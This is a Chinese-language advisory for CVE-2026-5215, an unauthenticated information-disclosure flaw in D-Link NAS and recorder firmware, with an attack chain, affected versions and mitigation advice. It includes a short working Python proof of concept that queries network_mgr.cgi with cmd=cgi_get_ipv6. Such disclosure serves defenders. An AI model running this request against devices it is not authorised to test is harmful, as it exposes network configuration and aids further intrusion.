CVE-2026-5215 D-Link设备访问控制缺失漏洞

漏洞信息

漏洞编号

CVE-2026-5215

漏洞类型

访问控制缺失

CVSS评分

4.3 中危

攻击向量

邻接 (AV:A)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

D-Link DNS-120, DNR-202L, DNS-315L, DNS-320, DNS-320L, DNS-320LW, DNS-321, DNR-322L, DNS-323, DNS-325, DNS-326, DNS-327L, DNR-326, DNS-340L, DNS-343, DNS-345, DNS-726-4, DNS-1100-4, DNS-1200-05, DNS-1550-04

漏洞概述

D-Link多款网络存储设备（NAS）及录像机存在访问控制缺失漏洞。由于/cgi-bin/network_mgr.cgi文件中的cgi_get_ipv6函数未实施有效的权限验证，未经身份认证的攻击者可通过邻接网络访问该接口，获取敏感信息。

技术细节

该漏洞源于D-Link特定型号设备固件中Web管理接口的代码逻辑缺陷。具体受影响的组件是处理网络管理的CGI脚本`/cgi-bin/network_mgr.cgi`，其中负责获取IPv6信息的`cgi_get_ipv6`函数未对调用者进行身份鉴权。正常情况下，此类系统配置接口应要求管理员登录，但漏洞允许绕过此检查。根据CVSS 3.1评分向量，攻击向量为邻接（AV:A），意味着攻击者必须与目标设备位于同一局域网或二层网络中。攻击复杂度低（AC:L），无需用户交互（UI:N）且无需任何权限（PR:N）。成功利用该漏洞可能导致低级别的机密性影响（C:L），例如泄露设备的网络配置、接口状态等敏感信息，虽然当前未观察到对完整性（I:N）和可用性（A:N）的直接影响，但信息泄露可能辅助进一步攻击。

攻击链分析

STEP 1

侦察

攻击者在局域网内扫描并识别 vulnerable D-Link 设备的 IP 地址。

STEP 2

漏洞利用

攻击者向目标设备的 /cgi-bin/network_mgr.cgi 发送包含 cmd=cgi_get_ipv6 参数的 HTTP GET 请求。

STEP 3

权限绕过

由于 cgi_get_ipv6 函数缺乏访问控制，设备直接处理请求并返回数据，无需攻击者提供凭证。

STEP 4

信息泄露

攻击者获取设备的 IPv6 网络配置及其他敏感系统信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# PoC for CVE-2026-5215: Improper Access Control in D-Link Devices
# Description: Accessing cgi_get_ipv6 without authentication

target_ip = "192.168.1.1"  # Replace with the target IP address
url = f"http://{target_ip}/cgi-bin/network_mgr.cgi"

# The vulnerable command
payload = {
    "cmd": "cgi_get_ipv6"
}

try:
    print(f"[*] Attempting to connect to {target_ip}...")
    response = requests.get(url, params=payload, timeout=10)
    
    if response.status_code == 200:
        print("[+] Request successful! The target might be vulnerable.")
        print("[+] Response content:")
        print(response.text)
    else:
        print(f"[-] Received status code: {response.status_code}")
        
except requests.exceptions.RequestException as e:
    print(f"[!] Error occurred: {e}")

影响范围

D-Link DNS-120 up to 20260205

D-Link DNR-202L up to 20260205

D-Link DNS-315L up to 20260205

D-Link DNS-320 up to 20260205

D-Link DNS-320L up to 20260205

D-Link DNS-320LW up to 20260205

D-Link DNS-321 up to 20260205

D-Link DNR-322L up to 20260205

D-Link DNS-323 up to 20260205

D-Link DNS-325 up to 20260205

D-Link DNS-326 up to 20260205

D-Link DNS-327L up to 20260205

D-Link DNR-326 up to 20260205

D-Link DNS-340L up to 20260205

D-Link DNS-343 up to 20260205

D-Link DNS-345 up to 20260205

D-Link DNS-726-4 up to 20260205

D-Link DNS-1100-4 up to 20260205

D-Link DNS-1200-05 up to 20260205

D-Link DNS-1550-04 up to 20260205

防御指南

临时缓解措施

如果无法立即升级固件，建议通过访问控制列表（ACL）限制仅信任的IP地址可以访问设备的管理界面。此外，应更改默认的管理员凭据，并密切监控设备的网络日志是否存在异常访问记录。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5215
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5215
3 Details https://www.cvedetails.com/cve/CVE-2026-5215/
4 VulDB https://vuldb.com/cve/CVE-2026-5215
5 Link https://github.com/wudipjq/my_vuln/blob/main/D-Link8/vuln_170/170.md
6 Link https://vuldb.com/submit/780440
7 Link https://vuldb.com/vuln/354351
8 Link https://vuldb.com/vuln/354351/cti
9 Link https://www.dlink.com/